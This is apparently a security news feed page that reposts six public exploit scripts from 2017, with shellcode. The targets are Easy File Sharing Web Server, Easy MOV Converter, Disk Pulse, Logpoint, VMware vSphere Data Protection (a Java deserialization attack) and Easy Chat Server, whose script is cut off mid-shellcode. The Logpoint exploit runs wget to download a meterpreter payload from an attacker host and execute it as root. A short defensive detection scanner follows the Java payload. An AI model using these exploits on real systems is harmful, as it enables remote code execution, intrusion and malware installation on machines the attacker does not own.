Exploits

Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow

SecurityLab.ru - Wed, 2017-06-14 03:00
#!/usr/bin/python
# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow
# Author : Touhid M.Shaikh
# Date : 12 June, 2017
# Contact: touhidshaikh22@gmail.com
# Version: 7.2
# category: Remote Exploit
# Tested on: Windows XP SP3 EN [Version 5.1.2600]

"""
######## Description ########

What is Easy File Sharing Web Server 7.2 ?

Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

######## Video PoC and Article ########
https://www.youtube.com/watch?v=Mdmd-7M8j-M
http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/
"""

import httplib

total = 4096

# Shellcode: open cmd.exe
shellcode = (
    "\x8b\xec\x55\x8b\xec"
    "\x68\x65\x78\x65\x2F"
    "\x68\x63\x6d\x64\x2e"
    "\x8d\x45\xf8\x50\xb8"
    "\xc7\x93\xc2\x77"
    "\xff\xd0")

our_code = "\x90" * 100                                 # NOP sled
our_code += shellcode
our_code += "\x90" * (4072 - 100 - len(shellcode))      # pad up to the saved return address
# point Ret to Nop Sled
our_code += "\x3c\x62\x83\x01"                          # Overwrite RET
our_code += "\x90" * 12                                 # NOP sled
our_code += "A" * (total - (4072 + 16))                 # filler past ESP

# Server address and port
httpServ = httplib.HTTPConnection("192.168.1.6", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp', 'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()

"""
NOTE : After Exiting to cmd.exe our server will be crash bcz of esp
Adjust esp by yourself ... hehhehhe...
"""

"""
(ASCII-art banner) __ __| _ \ | | | |_ _| __ \ | | | | | | | | | | | | | | | ___ | | | | _| \___/ \___/ _| _|___|____/
Touhid M.Shaikh
"""

Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)

SecurityLab.ru - Wed, 2017-06-14 02:57
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 13-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Easy MOV Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/easy_mov_converter.exe
# Tested On: Windows 7 SP1 32bit
#
# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################

# If you're using WinXP SP3, change this to 996
buffer = "\x41" * 1008

# short jump over the SEH record into the NOP padding
nSEH = "\xeb\x10\x90\x90"

# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll)
SEH = "\x5c\x14\x01\x10"

badchars = "\x00\x0a\x0d"  # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"

junk = "\x90" * 16
badchars = "\x0a\x0d"

data = buffer + nSEH + SEH + junk + buf

f = open("exploit.txt", "w")
f.write(data)
f.close()

Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow

SecurityLab.ru - Wed, 2017-06-14 02:56
#!/usr/bin/python
###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date: 12-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage: http://www.diskpulse.com/
# Version: 9.7.14
# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. Under Directories, click the plus sign
# 2. Paste content of exploit.txt in Add Directory textbox.
#
# <--- Marry and reproduce --->
#
##############################################################################

a = open("exploit.txt", "w")

badchars = "\x0a\x0d\x2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"

# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll)
jmpebp = "\x1f\x54\x1c\x65"

# Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part)
llamaleftovers = (
    "\x55"                  # push EBP
    "\x58"                  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBP + 0x200
    "\x40"                  # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)

junk = "\x55" + "\x53\x5b" * 107

data = "A" * 4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf

a.write(data)
a.close()

Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution

SecurityLab.ru - Mon, 2017-06-12 01:48
# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
# Date: 11/06/17
# Exploit Author: agix
# Vendor Homepage: https://www.logpoint.com
# Version: logpoint < 5.6.4
# Tested on: 5.6.2
#
# Vendor contact 19/04
# Exploit details sent to the vendor 24/04
# Patch in test mode 05/05
# Patch release to public 08/05
#
# run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
# to get root code execution this is the second stage e
# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
# it downloads a third stage executed as root

import time
import zmq
import sys
import json
import random
import string
import base64

ATTACKER_IP = '172.16.171.1'
LOGPOINT_IP = '172.16.171.204'


def crash():
    context = zmq.Context()
    sock = context.socket(zmq.DEALER)
    sock.connect("tcp://%s:5504" % LOGPOINT_IP)
    sock.send('crash')


crash()
time.sleep(1)

context = zmq.Context()
sock2 = context.socket(zmq.DEALER)
sock2.connect("tcp://%s:5504" % LOGPOINT_IP)

name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e' % ATTACKER_IP)
cmd2 = base64.b64encode('cat /tmp/e')
exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test' % (name, cmd1, cmd2)

tosend = json.dumps({"request_id": name, "query": "high_availability",
                     "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP,
                                    "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()

time.sleep(30)

# cleaning
tosend = json.dumps({"request_id": name + "-1", "query": "high_availability",
                     "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP,
                                    "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()

VMware vSphere Data Protection 5.x/6.x - Java Deserialization

SecurityLab.ru - Mon, 2017-06-12 01:48
#!/usr/bin/env python

import socket
import sys
import ssl


def getHeader():
    # Java RMI transport header: "JRMI", protocol version 2, StreamProtocol
    return '\x4a\x52\x4d\x49\x00\x02\x4b'


def payload():
    cmd = sys.argv[4]
    cmdlen = len(cmd)
    # Serialized Java object stream (STREAM_MAGIC 0xaced, version 5) carrying a
    # Commons-Collections transformer chain; the command is spliced in below.
    data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74'
    # TC_STRING with a one-byte length prefix (0x00, len) followed by the command itself
    data2 += '\x00' + chr(cmdlen)
    data2 += cmd
    data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
    return data2


def sslMode():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")


def exploitTarget(sock):
    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)

    print 'sending exploit headers\n'
    sock.send(getHeader())
    sock.recv(8192)

    print 'sending exploit\n'
    sock.send(payload())
    sock.close()
    print 'exploit completed.'


if __name__ == "__main__":
    if len(sys.argv) != 5:
        print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
        print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
        sys.exit(0)
    else:
        sock = None
        if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
            sock = sslMode()
        if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
        exploitTarget(sock)
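From the defender's side, what matters about the payload above is that it is a plain Java object-serialization stream (it starts with STREAM_MAGIC 0xaced 0x0005) that names the Commons-Collections gadget classes in clear text. The following added example, which is not part of the vSphere PoC, is a small triage scanner for captured RMI traffic: it walks a stream for TC_CLASSDESC records, pulls out the class names, and flags any class from the gadget chain. The scan is a heuristic (no full object-stream grammar), and the sample streams are constructed inline, not captured from a real appliance.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"   # java.io.ObjectStreamConstants: STREAM_MAGIC + STREAM_VERSION
TC_CLASSDESC = 0x72                   # tag that precedes a class name in the stream

# Class names that appear in the PoC payload's transformer chain; any of them
# arriving in a stream from an untrusted client is a strong indicator.
GADGET_CLASSES = {
    "org.apache.commons.collections.map.LazyMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
}

# What a Java class name (binary name, possibly an array descriptor) looks like.
NAME_RE = re.compile(rb"\A[A-Za-z0-9_$.\[;/]+\Z")


def java_stream_classes(data):
    """Return the class names found in TC_CLASSDESC records of a serialized stream.

    Heuristic scan: at each 0x72 byte, read a big-endian u16 length and accept the
    bytes that follow only if they look like a Java class name. That is not a
    full parse of the object-stream grammar, but it is enough for triage."""
    if not data.startswith(STREAM_MAGIC):
        return []
    names = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            candidate = data[i + 3:i + 3 + length]
            if 0 < length <= 255 and len(candidate) == length and NAME_RE.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length          # skip the name so bytes inside it are not re-scanned
                continue
        i += 1
    return names


def classify_stream(data):
    """Summarise a captured blob: is it Java serialization at all, which classes
    does it name, and do any of them belong to the known gadget chain?"""
    names = java_stream_classes(data)
    return {
        "is_java_serialized": data.startswith(STREAM_MAGIC),
        "classes": names,
        "gadget_hits": sorted(set(names) & GADGET_CLASSES),
    }


def _classdesc(name):
    # Constructed helper: one TC_CLASSDESC record (tag, u16 length, name) followed by
    # the 8-byte serialVersionUID slot a real record carries (zeroed here).
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode("ascii") + b"\x00" * 8


# Constructed sample streams (not captured traffic): a harmless HashMap, and a
# chain that names the same classes, in the same order, as the PoC payload.
BENIGN_STREAM = STREAM_MAGIC + b"\x73" + _classdesc("java.util.HashMap")
GADGET_STREAM = (
    STREAM_MAGIC + b"\x73"
    + _classdesc("sun.reflect.annotation.AnnotationInvocationHandler")
    + _classdesc("org.apache.commons.collections.map.LazyMap")
    + _classdesc("org.apache.commons.collections.functors.ChainedTransformer")
    + _classdesc("org.apache.commons.collections.functors.InvokerTransformer")
)
NOT_JAVA = b"JRMI\x00\x02\x4b"  # the bare RMI transport header, no object stream


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_STREAM), ("gadget", GADGET_STREAM), ("rmi-header", NOT_JAVA)):
        print(label, classify_stream(blob))
```

The same check belongs on the receiving side as well: a JVM that must accept serialized input should run with a deserialization filter (`jdk.serialFilter` on supported releases) that rejects these classes outright, so that detection on the wire is a second line rather than the only one.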

EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)

SecurityLab.ru - Mon, 2017-06-12 01:44
# Exploit Title: Easy Chat Server User Registration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]
# ======================================================================================================================
# Username parameter in Registration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
# ======================================================================================================================
# USAGE: python exploit.py ip

#!/usr/bin/python
import os
import sys
import socket

ip = sys.argv[1]
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((ip, 80))

# Alphanumeric shellcode
shellcode = (
    "\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
    "\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
    "\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
    "\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
    "\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
    "\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
    "\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
    "\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
    "\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
    "\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
